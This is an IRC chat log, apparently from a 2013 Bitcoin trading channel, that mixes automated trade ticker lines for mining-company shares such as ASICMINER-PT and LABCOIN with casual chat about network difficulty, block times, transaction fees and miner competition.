BTC [+] Aug 24 19:50:39 [BTCTC] [TAT.ASICMINER] 20 @ 0.02349 = 0.4698 BTC [+] Aug 24 19:51:01 [BTCTC] [TAT.ASICMINER] 33 @ 0.02349 = 0.7752 BTC [+] Aug 24 19:51:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.02349 = 0.0705 BTC [+] Aug 24 19:51:26 [BTCTC] [TAT.ASICMINER] 11 @ 0.02301 = 0.2531 BTC [-] Aug 24 19:51:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.023 BTC [-] Aug 24 19:51:51 [BTCTC] [TAT.ASICMINER] 11 @ 0.02299 = 0.2529 BTC [-] Aug 24 19:52:17 [BTCTC] [TAT.ASICMINER] 15 @ 0.02298 = 0.3447 BTC [-] Aug 24 19:52:19 [BTCTC] [TAT.ASICMINER] 15 @ 0.02299 = 0.3449 BTC [+] Aug 24 19:52:32 [BTCTC] [DMS.MINING] 30 @ 0.003699 = 0.111 BTC [-] Aug 24 19:53:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.023 = 0.046 BTC [+] Aug 24 19:53:36 [BTCTC] [DMS.MINING] 24 @ 0.003699 = 0.0888 BTC [-] Aug 24 19:53:47 [BTCTC] [RSM] 2 @ 0.0125 = 0.025 BTC [+] Aug 24 19:54:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.02299 = 0.115 BTC [-] Aug 24 19:54:28 [BTCTC] [TAT.ASICMINER] 20 @ 0.02299 = 0.4598 BTC [-] Aug 24 19:55:17 [BTCTC] [TAT.ASICMINER] 3 @ 0.02299 = 0.069 BTC [-] Aug 24 19:55:28 [BTCTC] [KENILWORTH] 30 @ 0.0018 = 0.054 BTC [+] Aug 24 19:55:53 [BTCTC] [ASICMINER-PT] 1 @ 2.442 BTC [-] Aug 24 19:55:55 [BTCTC] [ASICMINER-PT] 1 @ 2.443 BTC [+] Aug 24 19:56:01 [BTCTC] [ASICMINER-PT] 4 @ 2.444 = 9.776 BTC [+] Aug 24 19:56:05 [BTCTC] [ASICMINER-PT] 2 @ 2.449 = 4.898 BTC [+] Aug 24 19:56:14 [BTCTC] [TAT.ASICMINER] 4 @ 0.02298 = 0.0919 BTC [-] Aug 24 19:56:15 [BTCTC] [TAT.ASICMINER] 39 @ 0.02299 = 0.8966 BTC [+] Aug 24 19:56:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.023 = 0.184 BTC [+] Aug 24 19:56:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.02297 BTC [-] Aug 24 19:57:43 [BTCTC] [ASICMINER-PT] 1 @ 2.403 BTC [-] Aug 24 19:57:44 [BTCTC] [ASICMINER-PT] 1 @ 2.402 BTC [-] Aug 24 19:57:46 [BTCTC] [ASICMINER-PT] 4 @ 2.4 = 9.6 BTC [-] Aug 24 19:58:40 [BTCTC] [DMS.PURCHASE] 25 @ 0.01934 = 0.4835 BTC [-] Aug 24 19:58:41 [BTCTC] [DMS.PURCHASE] 20 @ 0.01933 = 0.3866 BTC [-] Aug 24 19:58:42 [BTCTC] [DMS.PURCHASE] 1 @ 0.01931 BTC [-] Aug 24 19:58:43 [BTCTC] [DMS.PURCHASE] 1 @ 0.0176 BTC [-] Aug 24 19:58:43 [BTCTC] [ASICMINER-PT] 1 @ 2.401 BTC [+] Aug 24 19:58:45 [BTCTC] [ASICMINER-PT] 5 @ 2.4 = 12 BTC [-] Aug 24 19:58:59 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [-] Aug 24 19:59:02 [BTCTC] [DMS.PURCHASE] 1 @ 0.0024 BTC [-] Aug 24 19:59:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.02257 = 0.0451 BTC [-] Aug 24 19:59:48 [BTCTC] [ASICMINER-PT] 1 @ 2.352 BTC [-] Aug 24 20:00:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.02347 = 0.0939 BTC [+] Aug 24 20:00:17 [BTCTC] [TAT.ASICMINER] 67 @ 0.02348 = 1.5732 BTC [+] Aug 24 20:00:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.02351 = 0.2351 BTC [+] Aug 24 20:00:19 [BTCTC] [TAT.ASICMINER] 19 @ 0.02352 = 0.4469 BTC [+] Aug 24 20:01:44 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000971 BTC [-] Aug 24 20:01:45 [BTCTC] [TAT.VIRTUALMINE] 609 @ 0.000999 = 0.6084 BTC [+] Aug 24 20:02:00 [BTCTC] [DMS.MINING] 2 @ 0.003776 = 0.0076 BTC [+] Aug 24 20:02:23 [BTCTC] [ASICMINER-PT] 1 @ 2.352 BTC [-] Aug 24 20:02:25 [BTCTC] [ASICMINER-PT] 2 @ 2.351 = 4.702 BTC [-] Aug 24 20:02:26 [BTCTC] [ASICMINER-PT] 10 @ 2.35 = 23.5 BTC [-] Aug 24 20:02:27 [BTCTC] [ASICMINER-PT] 2 @ 2.335 = 4.67 BTC [-] Aug 24 20:02:28 [BTCTC] [ASICMINER-PT] 4 @ 2.325 = 9.3 BTC [-] Aug 24 20:02:30 [BTCTC] [ASICMINER-PT] 9 @ 2.32 = 20.88 BTC [-] Aug 24 20:02:31 [BTCTC] [ASICMINER-PT] 2 @ 2.32 = 4.64 BTC [-] Aug 24 20:02:32 [BTCTC] [ASICMINER-PT] 1 @ 2.31 BTC [-] Aug 24 20:02:32 [BTCTC] [ASICMINER-PT] 2 @ 2.301 = 4.602 BTC [-] Aug 24 20:02:33 [BTCTC] [ASICMINER-PT] 1 @ 2.301 BTC [-] Aug 24 20:02:34 [BTCTC] [ASICMINER-PT] 5 @ 2.3 = 11.5 BTC [-] Aug 24 20:02:35 [BTCTC] [ASICMINER-PT] 19 @ 2.3 = 43.7 BTC [-] Aug 24 20:02:36 [BTCTC] [ASICMINER-PT] 2 @ 2.3 = 4.6 BTC [-] Aug 24 20:02:37 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Aug 24 20:02:39 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Aug 24 20:02:40 [BTCTC] [ASICMINER-PT] 5 @ 2.28 = 11.4 BTC [-] Aug 24 20:02:41 [BTCTC] [ASICMINER-PT] 1 @ 2.28 BTC [-] Aug 24 20:02:42 [BTCTC] [ASICMINER-PT] 3 @ 2.252 = 6.756 BTC [-] Aug 24 20:02:43 [BTCTC] [ASICMINER-PT] 1 @ 2.251 BTC [-] Aug 24 20:02:43 [BTCTC] [ASICMINER-PT] 3 @ 2.251 = 6.753 BTC [-] Aug 24 20:02:45 [BTCTC] [ASICMINER-PT] 3 @ 2.251 = 6.753 BTC [-] Aug 24 20:02:45 [BTCTC] [ASICMINER-PT] 3 @ 2.251 = 6.753 BTC [-] Aug 24 20:03:16 [BTCTC] [TAT.ASICMINER] 67 @ 0.02263 = 1.5162 BTC [-] Aug 24 20:03:17 [BTCTC] [TAT.ASICMINER] 13 @ 0.02262 = 0.2941 BTC [-] Aug 24 20:03:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.02259 BTC [-] Aug 24 20:03:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.02258 = 0.1129 BTC [-] Aug 24 20:03:21 [BTCTC] [TAT.ASICMINER] 15 @ 0.02257 = 0.3386 BTC [-] Aug 24 20:03:22 [BTCTC] [TAT.ASICMINER] 30 @ 0.02256 = 0.6768 BTC [-] Aug 24 20:03:23 [BTCTC] [TAT.ASICMINER] 45 @ 0.02256 = 1.0152 BTC [-] Aug 24 20:03:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.02255 = 0.0451 BTC [-] Aug 24 20:03:26 [BTCTC] [TAT.ASICMINER] 18 @ 0.02254 = 0.4057 BTC [-] Aug 24 20:03:26 [BTCTC] [TAT.ASICMINER] 20 @ 0.02253 = 0.4506 BTC [-] Aug 24 20:03:27 [BTCTC] [TAT.ASICMINER] 70 @ 0.02252 = 1.5764 BTC [-] Aug 24 20:03:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.02212 BTC [-] Aug 24 20:06:18 [HAVELOCK] [AM1] 1 @ 2.2501 BTC [-] Aug 24 20:07:35 [BTCTC] [ASICMINER-PT] 4 @ 2.28 = 9.12 BTC [+] Aug 24 20:07:37 [BTCTC] [ASICMINER-PT] 1 @ 2.255 BTC [-] Aug 24 20:08:52 [BTCTC] [LABCOIN] 2 @ 0.002939 = 0.0059 BTC [+] Aug 24 20:08:54 [BTCTC] [LABCOIN] 20 @ 0.00294 = 0.0588 BTC [+] Aug 24 20:08:55 [BTCTC] [LABCOIN] 22 @ 0.002989 = 0.0658 BTC [+] Aug 24 20:08:56 [BTCTC] [LABCOIN] 90 @ 0.00299 = 0.2691 BTC [+] Aug 24 20:08:56 [BTCTC] [LABCOIN] 50 @ 0.002993 = 0.1497 BTC [+] Aug 24 20:08:57 [BTCTC] [LABCOIN] 200 @ 0.002994 = 0.5988 BTC [+] Aug 24 20:08:59 [BTCTC] [LABCOIN] 1516 @ 0.002998 = 4.545 BTC [+] Aug 24 20:09:31 [BTCTC] [LABCOIN] 85 @ 0.002894 = 0.246 BTC [-] Aug 24 20:09:33 [BTCTC] [LABCOIN] 20 @ 0.002893 = 0.0579 BTC [-] Aug 24 20:09:34 [BTCTC] [LABCOIN] 1207 @ 0.002892 = 3.4906 BTC [-] Aug 24 20:11:08 [BTCTC] [ASICMINER-PT] 12 @ 2.256 = 27.072 BTC [+] Aug 24 20:14:32 [BTCTC] [TAT.ASICMINER] 12 @ 0.02338 = 0.2806 BTC [+] Aug 24 20:15:13 [BTCTC] [LABCOIN] 5 @ 0.002992 = 0.015 BTC [+] Aug 24 20:18:16 [BTCTC] [ASICMINER-PT] 1 @ 2.265 BTC [+] Aug 24 20:18:35 [BTCTC] [ASICMINER-PT] 1 @ 2.261 BTC [-] Aug 24 20:18:44 [BTCTC] [LABCOIN] 4 @ 0.002987 = 0.0119 BTC [-] Aug 24 20:18:58 [BTCTC] [TAT.ASICMINER] 67 @ 0.02301 = 1.5417 BTC [-] Aug 24 20:18:59 [BTCTC] [TAT.ASICMINER] 33 @ 0.023 = 0.759 BTC [-] Aug 24 20:19:23 what's with everyone checking diff nervously today? anything i need to know? Aug 24 20:19:26 [BTCTC] [TAT.ASICMINER] 4 @ 0.023 = 0.092 BTC [-] Aug 24 20:20:28 doesnt seem any more than usual Aug 24 20:20:31 plus its a change day Aug 24 20:21:28 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0009969 BTC [-] Aug 24 20:21:41 [BTCTC] [LABCOIN] 85 @ 0.002905 = 0.2469 BTC [-] Aug 24 20:21:48 [BTCTC] [ASICMINER-PT] 1 @ 2.348 BTC [+] Aug 24 20:21:50 [BTCTC] [ASICMINER-PT] 1 @ 2.349 BTC [+] Aug 24 20:22:09 [BTCTC] [ASICMINER-PT] 3 @ 2.35 = 7.05 BTC [+] Aug 24 20:22:12 [BTCTC] [LABCOIN] 20 @ 0.002904 = 0.0581 BTC [-] Aug 24 20:22:14 [BTCTC] [LABCOIN] 42 @ 0.002897 = 0.1217 BTC [-] Aug 24 20:22:47 looks like AM found bottom for now Aug 24 20:22:51 or maybe less other conversation Aug 24 20:24:50 [BTCTC] [ASICMINER-PT] 1 @ 2.392 BTC [+] Aug 24 20:24:51 [BTCTC] [ASICMINER-PT] 3 @ 2.393 = 7.179 BTC [+] Aug 24 20:24:53 [BTCTC] [ASICMINER-PT] 5 @ 2.394 = 11.97 BTC [+] Aug 24 20:24:54 [BTCTC] [ASICMINER-PT] 1 @ 2.395 BTC [+] Aug 24 20:24:55 [BTCTC] [ASICMINER-PT] 1 @ 2.409 BTC [+] Aug 24 20:24:56 [BTCTC] [ASICMINER-PT] 3 @ 2.41 = 7.23 BTC [+] Aug 24 20:24:58 [BTCTC] [ASICMINER-PT] 1 @ 2.445 BTC [+] Aug 24 20:24:59 [BTCTC] [ASICMINER-PT] 1 @ 2.445 BTC [+] Aug 24 20:25:00 [BTCTC] [ASICMINER-PT] 11 @ 2.446 = 26.906 BTC [+] Aug 24 20:25:03 Boom Aug 24 20:25:48 [BTCTC] [CRYPTO-TRADE] 34 @ 0.2 = 6.8 BTC [+] Aug 24 20:26:21 [BTCTC] [ASICMINER-PT] 1 @ 2.444 BTC [-] Aug 24 20:26:41 [BTCTC] [ASICMINER-PT] 7 @ 2.445 = 17.115 BTC [+] Aug 24 20:26:41 [BTCTC] [ASICMINER-PT] 7 @ 2.447 = 17.129 BTC [+] Aug 24 20:27:29 [BTCTC] [ASICMINER-PT] 1 @ 2.446 BTC [-] Aug 24 20:27:31 [BTCTC] [TAT.ASICMINER] 67 @ 0.02417 = 1.6194 BTC [+] Aug 24 20:28:11 [BTCTC] [ASICMINER-PT] 2 @ 2.46 = 4.92 BTC [+] Aug 24 20:28:13 [BTCTC] [ASICMINER-PT] 78 @ 2.46 = 191.88 BTC [+] Aug 24 20:28:43 nice Aug 24 20:28:51 [BTCTC] [ASICMINER-PT] 1 @ 2.647 BTC [+] Aug 24 20:28:59 [BTCTC] [DMS.MINING] 37 @ 0.003775 = 0.1397 BTC [-] Aug 24 20:28:59 I think it would be pretty funny to see friedcat come out with an announcement on the next gen chips and bang the hash rate back up to 25-30% Aug 24 20:29:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0242 BTC [+] Aug 24 20:29:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.02436 = 0.2436 BTC [+] Aug 24 20:29:41 [BTCTC] [TAT.ASICMINER] 15 @ 0.02437 = 0.3656 BTC [+] Aug 24 20:30:12 [BTCTC] [ASICMINER-PT] 1 @ 2.648 BTC [+] Aug 24 20:30:23 [BTCTC] [TAT.ASICMINER] 7 @ 0.02436 = 0.1705 BTC [-] Aug 24 20:30:24 [BTCTC] [LTC-ATF.B2] 6 @ 0.01043 = 0.0626 BTC [+] Aug 24 20:30:26 [BTCTC] [TAT.ASICMINER] 29 @ 0.02437 = 0.7067 BTC [+] Aug 24 20:30:26 he told everyone what's going on, they just get scared about no divs Aug 24 20:30:41 [BTCTC] [TAT.ASICMINER] 7 @ 0.02437 = 0.1706 BTC [+] Aug 24 20:30:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.02438 = 0.0488 BTC [+] Aug 24 20:30:43 [BTCTC] [TAT.ASICMINER] 11 @ 0.02439 = 0.2683 BTC [+] Aug 24 20:30:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0244 BTC [+] Aug 24 20:33:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0247 BTC [+] Aug 24 20:33:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [+] Aug 24 20:33:53 [BTCTC] [TAT.ASICMINER] 71 @ 0.02489 = 1.7672 BTC [+] Aug 24 20:33:55 [BTCTC] [TAT.ASICMINER] 77 @ 0.0249 = 1.9173 BTC [+] Aug 24 20:34:54 [HAVELOCK] [SMG] 2 @ 0.000238 = 0.0005 BTC [+] Aug 24 20:35:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.02488 = 0.0498 BTC [-] Aug 24 20:36:20 [BTCTC] [TAT.ASICMINER] 6 @ 0.02488 = 0.1493 BTC [-] Aug 24 20:36:34 [HAVELOCK] [AM100] 1 @ 0.024 BTC [+] Aug 24 20:36:39 [BTCTC] [DMS.SELLING] 12 @ 0.01642 = 0.197 BTC [-] Aug 24 20:37:09 [BTCTC] [DMS.SELLING] 11 @ 0.01641 = 0.1805 BTC [-] Aug 24 20:37:26 [HAVELOCK] [AM100] 2 @ 0.024 = 0.048 BTC [+] Aug 24 20:37:50 [BTCTC] [TAT.ASICMINER] 50 @ 0.02489 = 1.2445 BTC [+] Aug 24 20:37:53 http://bitbet.us/bet/519/btc-network-difficulty-to-top-1b-before-2014/ Aug 24 20:37:59 BitBet - BTC network difficulty to top 1B before 2014 Aug 24 20:38:16 4 months out. 2 btc on yes. Aug 24 20:38:34 [BTCTC] [ASICMINER-PT] 2 @ 2.64 = 5.28 BTC [-] Aug 24 20:39:12 [BTCTC] [TAT.ASICMINER] 16 @ 0.0249 = 0.3984 BTC [+] Aug 24 20:39:33 [BTCTC] [ASICMINER-PT] 7 @ 2.6 = 18.2 BTC [-] Aug 24 20:40:08 [BTCTC] [LABCOIN] 10 @ 0.002959 = 0.0296 BTC [+] Aug 24 20:40:08 [BTCTC] [LABCOIN] 85 @ 0.00296 = 0.2516 BTC [+] Aug 24 20:40:08 [BTCTC] [LABCOIN] 42 @ 0.002962 = 0.1244 BTC [+] Aug 24 20:40:24 [BTCTC] [LABCOIN] 20 @ 0.002964 = 0.0593 BTC [+] Aug 24 20:41:00 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [-] Aug 24 20:41:10 .d Aug 24 20:41:10 65750060.14908 | Next Diff in 1986 blocks | Estimated Change: 32.0519% in 9d 8h 51m 55s Aug 24 20:41:48 [BTCTC] [LABCOIN] 43 @ 0.002964 = 0.1275 BTC [+] Aug 24 20:42:13 [BTCTC] [KENILWORTH] 100 @ 0.0018 = 0.18 BTC [+] Aug 24 20:42:48 [BTCTC] [LABCOIN] 76 @ 0.002966 = 0.2254 BTC [+] Aug 24 20:42:49 [BTCTC] [LABCOIN] 100 @ 0.002967 = 0.2967 BTC [+] Aug 24 20:43:02 http://drugoi.livejournal.com/3889893.html Aug 24 20:43:15 more miners, yay! https://bitcointalk.org/index.php?topic=280570.msg1521109;topicseen#new Aug 24 20:43:33 [BTCTC] [LABCOIN] 50 @ 0.002998 = 0.1499 BTC [+] Aug 24 20:43:35 ic, no animals harmed Aug 24 20:44:21 who's putin with, his hitman? Aug 24 20:44:45 [BTCTC] [KENILWORTH] 40 @ 0.0018 = 0.072 BTC [+] Aug 24 20:45:45 [HAVELOCK] [AM100] 7 @ 0.024 = 0.168 BTC [+] Aug 24 20:45:48 [HAVELOCK] [AM100] 23 @ 0.0241 = 0.5543 BTC [+] Aug 24 20:47:11 lol got that from fb and actually they talk more about the old woman Aug 24 20:47:41 apparently russian blogers blew her cover as pretending war veteran Aug 24 20:48:01 you mean formerly alive bloggers Aug 24 20:48:47 [BTCTC] [LABCOIN] 10 @ 0.002994 = 0.0299 BTC [-] Aug 24 20:48:48 [BTCTC] [LABCOIN] 20 @ 0.002995 = 0.0599 BTC [+] Aug 24 20:48:49 [BTCTC] [LABCOIN] 100 @ 0.002997 = 0.2997 BTC [+] Aug 24 20:49:28 the dude on the left looks pretty hardcore Aug 24 20:49:37 those are some ass-kicking boots Aug 24 20:49:58 reinforced knuckles on the gloves Aug 24 20:50:00 wtf is he? Aug 24 20:50:01 zactly. more one looks at the pic, more wtfy it is Aug 24 20:50:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.02497 BTC [+] Aug 24 20:50:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.02497 = 0.2497 BTC [+] Aug 24 20:50:50 a biker i guess Aug 24 20:50:59 and it's real photo from some new fountain (named Child dance) unveiling in Volgograd Aug 24 20:50:59 from the year 3030 Aug 24 20:51:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.02497 = 0.2497 BTC [+] Aug 24 20:51:48 [BTCTC] [DMS.MINING] 2 @ 0.00377 = 0.0075 BTC [-] Aug 24 20:51:53 [BTCTC] [DMS.PURCHASE] 20 @ 0.02196 = 0.4392 BTC [+] Aug 24 20:54:09 [BTCTC] [TAT.ASICMINER] 40 @ 0.02497 = 0.9988 BTC [+] Aug 24 20:54:17 [BTCTC] [LABCOIN] 20 @ 0.002968 = 0.0594 BTC [-] Aug 24 20:54:18 [BTCTC] [LABCOIN] 124 @ 0.002967 = 0.3679 BTC [-] Aug 24 20:54:35 [HAVELOCK] [LABCO] 3 @ 0.00339 = 0.0102 BTC [+] Aug 24 20:55:13 [BTCTC] [LABCOIN] 18 @ 0.002941 = 0.0529 BTC [-] Aug 24 20:55:48 .d Aug 24 20:55:49 65750060.14908 | Next Diff in 1983 blocks | Estimated Change: 38.1524% in 8d 12h 18m 52s Aug 24 20:56:18 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] Aug 24 20:56:20 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 24 20:57:31 [BTCTC] [LABCOIN] 1 @ 0.002996 BTC [+] Aug 24 20:58:20 [BTCTC] [LABCOIN] 77 @ 0.002996 = 0.2307 BTC [+] Aug 24 20:58:22 [BTCTC] [LABCOIN] 7 @ 0.002997 = 0.021 BTC [+] Aug 24 20:58:23 [BTCTC] [LABCOIN] 1576 @ 0.002999 = 4.7264 BTC [+] Aug 24 20:59:34 [BTCTC] [TAT.ASICMINER] 36 @ 0.02496 = 0.8986 BTC [-] Aug 24 21:00:26 [BTCTC] [DMS.MINING] 20 @ 0.003699 = 0.074 BTC [-] Aug 24 21:00:28 [BTCTC] [DMS.SELLING] 2 @ 0.01655 = 0.0331 BTC [+] Aug 24 21:00:33 [HAVELOCK] [AM1] 1 @ 2.6899 BTC [+] Aug 24 21:00:54 [BTCTC] [DMS.SELLING] 18 @ 0.0165 = 0.297 BTC [-] Aug 24 21:01:29 [BTCTC] [DMS.SELLING] 582 @ 0.0165 = 9.603 BTC [-] Aug 24 21:01:38 [BTCTC] [TAT.ASICMINER] 27 @ 0.02496 = 0.6739 BTC [-] Aug 24 21:02:36 [BTCTC] [KENILWORTH] 9 @ 0.0018 = 0.0162 BTC [+] Aug 24 21:04:00 [BTCTC] [DMS.MINING] 3 @ 0.00377 = 0.0113 BTC [+] Aug 24 21:04:13 [BTCTC] [DMS.SELLING] 3 @ 0.0166 = 0.0498 BTC [+] Aug 24 21:04:25 [HAVELOCK] [XBOND] 1 @ 0.0011689 BTC [-] Aug 24 21:05:04 [BTCTC] [RSM] 8 @ 0.0125 = 0.1 BTC [+] Aug 24 21:05:17 [HAVELOCK] [HIM] 2 @ 0.193 = 0.386 BTC [-] Aug 24 21:05:35 [BTCTC] [TAT.ASICMINER] 30 @ 0.02495 = 0.7485 BTC [-] Aug 24 21:06:02 [BTCTC] [ASICMINER-PT] 1 @ 2.491 BTC [-] Aug 24 21:10:49 [BTCTC] [DMS.MINING] 1 @ 0.00377 BTC [+] Aug 24 21:11:04 [BTCTC] [ACTIVEMINING] 68 @ 0.0054 = 0.3672 BTC [+] Aug 24 21:11:14 [BTCTC] [LABCOIN] 20 @ 0.002998 = 0.06 BTC [-] Aug 24 21:11:15 [BTCTC] [LABCOIN] 320 @ 0.002999 = 0.9597 BTC [+] Aug 24 21:12:26 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [+] Aug 24 21:12:28 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 24 21:12:29 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [-] Aug 24 21:12:30 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [-] Aug 24 21:12:32 [BTCTC] [ASICMINER-PT] 5 @ 2.47 = 12.35 BTC [-] Aug 24 21:12:59 [BTCTC] [ASICMINER-PT] 1 @ 2.471 BTC [+] Aug 24 21:13:23 [BTCTC] [LABCOIN] 1258 @ 0.002999 = 3.7727 BTC [+] Aug 24 21:13:33 [HAVELOCK] [SDSTM] 1 @ 0.0057 BTC [+] Aug 24 21:13:38 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Aug 24 21:13:57 [BTCTC] [LABCOIN] 90 @ 0.002999 = 0.2699 BTC [+] Aug 24 21:16:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.02494 = 0.0748 BTC [-] Aug 24 21:16:51 .d Aug 24 21:16:52 65750060.14908 | Next Diff in 1980 blocks | Estimated Change: 40.4695% in 8d 4h 17m 53s Aug 24 21:16:56 [BTCTC] [LABCOIN] 141 @ 0.002999 = 0.4229 BTC [+] Aug 24 21:17:08 lol Aug 24 21:20:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.02498 = 0.05 BTC [+] Aug 24 21:20:50 [MPEX] [S.MPOE] 7737 @ 0.00082664 = 6.3957 BTC [-] Aug 24 21:22:08 [BTCTC] [DMS.MINING] 10 @ 0.00377 = 0.0377 BTC [+] Aug 24 21:23:17 [BTCTC] [DMS.SELLING] 1 @ 0.0166 BTC [+] Aug 24 21:23:31 [BTCTC] [DMS.MINING] 1 @ 0.00377 BTC [+] Aug 24 21:24:50 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.000786 = 0.0786 BTC [-] Aug 24 21:24:51 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000785 BTC [-] Aug 24 21:24:53 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.000781 = 0.0781 BTC [-] Aug 24 21:26:27 he told everyone what's going on, they just get scared about no divs ... was this on the forums? I dont remember seeing any announcements lately... but then again i been buried in work Aug 24 21:26:41 [BTCTC] [LABCOIN] 1615 @ 0.002999 = 4.8434 BTC [+] Aug 24 21:27:37 [BTCTC] [DMS.MINING] 40 @ 0.00377 = 0.1508 BTC [+] Aug 24 21:29:54 ystarnaud >>> https://bitcointalk.org/index.php?action=profile;u=49840;sa=showPosts Aug 24 21:31:14 [BTCTC] [TAT.ASICMINER] 40 @ 0.0247 = 0.988 BTC [-] Aug 24 21:31:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.0247 = 0.0741 BTC [-] Aug 24 21:32:04 [BTCTC] [COGNITIVE] 1 @ 0.3532 BTC [-] Aug 24 21:33:41 [BTCTC] [LTC-ATF.B2] 1 @ 0.01043 BTC [+] Aug 24 21:33:44 [BTCTC] [COGNITIVE] 4 @ 0.3533 = 1.4132 BTC [+] Aug 24 21:33:58 [BTCTC] [DMS.MINING] 17 @ 0.00377 = 0.0641 BTC [+] Aug 24 21:34:55 [BTCTC] [ASICMINER-PT] 1 @ 2.358 BTC [-] Aug 24 21:35:34 [BTCTC] [COGNITIVE] 6 @ 0.3537 = 2.1222 BTC [+] Aug 24 21:36:05 [BTCTC] [COGNITIVE] 5 @ 0.3538 = 1.769 BTC [+] Aug 24 21:36:19 ThickAsThieves: thanks much Aug 24 21:36:43 np! Aug 24 21:36:58 [BTCTC] [TAT.ASICMINER] 6 @ 0.02493 = 0.1496 BTC [+] Aug 24 21:38:12 How much hash was it AM is planning to bring to the network before end of year? wasnt it something crazy like 1000TH? Aug 24 21:38:26 yeah Aug 24 21:38:30 something like that Aug 24 21:39:01 good buying opportunity, if one where to believe that Aug 24 21:39:03 the presentation noted 800TH-1000TH Aug 24 21:39:07 [BTCTC] [LTC-ATF.B2] 1 @ 0.01025 BTC [-] Aug 24 21:39:24 1000TH in december sounds very competive Aug 24 21:39:29 that depends on what you think every other miner will do Aug 24 21:39:58 surely that is calcuated based on next gen asicminer miners though Aug 24 21:40:03 true Aug 24 21:40:18 they're going to run each other out of business Aug 24 21:40:35 many will be run out of business Aug 24 21:40:42 mostly the ones that havent even started yet Aug 24 21:40:51 heh thats kinda gay Aug 24 21:40:56 the SD group Aug 24 21:41:03 came out with ver 4 of the SD spec Aug 24 21:41:22 the sucky thing about all this hashing being added is that its not improving the network in any way.. i.e transactions doesnt go through faster, etc Aug 24 21:42:07 UHS-II cards, defined in Version 4.0, further raise the data transfer rate to a theoretical maximum of 312 MB/s using additional row of pins Aug 24 21:42:44 [BTCTC] [LABCOIN] 3270 @ 0.003 = 9.81 BTC [+] Aug 24 21:42:44 bobbabad, they do actually, Aug 24 21:43:04 if the diff always goes up, then the block time is less than normal Aug 24 21:43:20 which makes it about as fast as the fastest CF cards Aug 24 21:43:29 also, more miners is a more stable network Aug 24 21:43:32 I wonder if difficulty will ever go down in the next 2-3 years Aug 24 21:43:32 [BTCTC] [DMS.SELLING] 5 @ 0.01622 = 0.0811 BTC [-] Aug 24 21:43:33 [BTCTC] [DMS.MINING] 5 @ 0.003699 = 0.0185 BTC [-] Aug 24 21:43:35 [BTCTC] [DMS.PURCHASE] 5 @ 0.01974 = 0.0987 BTC [-] Aug 24 21:43:37 it's pretty important Aug 24 21:43:48 we need a vast economy of miners Aug 24 21:44:25 aha... so the fundamentals of bitcoins pretty much dictate that the transaction times will always be slow? regardless on how much hash power we through at it, as difficulty will rise to keep block times constant? Aug 24 21:44:42 no Aug 24 21:44:47 more nodes help Aug 24 21:44:52 i'm not a pro at all this Aug 24 21:44:57 someone else could better explain it Aug 24 21:45:32 recordings transactions in blocks will always be a slow in the long run Aug 24 21:46:40 [BTCTC] [LABCOIN] 2000 @ 0.003 = 6 BTC [+] Aug 24 21:46:45 a block is generated every 10 mins... if you pay higher transaction fees you go ahead of the queue hence getting faster transfer Aug 24 21:47:13 still have to wait for a block Aug 24 21:47:20 bitcoin isnt slow at all... you're just too cheap to pay for faster transactions :P Aug 24 21:47:33 yeah thats how the mechanics work Aug 24 21:47:34 oh I see, so If I pay a abnormally high fee it should go through in 10mins garuanteed Aug 24 21:47:40 a block will never be generated faster Aug 24 21:47:52 blocks can take more than 10 minutes to be found Aug 24 21:48:03 pankakke: nope Aug 24 21:48:10 ystarnaud, everything is relative I guess.. 10min is still not very fast imho Aug 24 21:48:24 yes they can. they are found on average at 10 minutes Aug 24 21:48:36 it's a brute force process, you do not know when you will find the right hash Aug 24 21:48:55 isnt the average faster now becaus eit cant catch up with diff Aug 24 21:48:56 just look, https://blockchain.info/ 41 minutes without a block Aug 24 21:49:08 yeah the average is usually lower Aug 24 21:49:12 like 5min or something Aug 24 21:49:25 there was an article about this recently Aug 24 21:49:30 so that means that if I sent an transaction 41 minutes ago it would still not have any confirmations? sorry a bit noobish with all this Aug 24 21:49:33 5 min would mean difficulty doubling! Aug 24 21:49:49 bobbabad: yes Aug 24 21:49:56 http://thegenesisblock.com/bitcoin-block-time-halved-to-five-minutes-amid-exponential-network-growth/ Aug 24 21:49:59 Bitcoin Block Time Halved To Five Minutes Amid Exponential Network Growth - The Genesis Block Aug 24 21:50:06 [BTCTC] 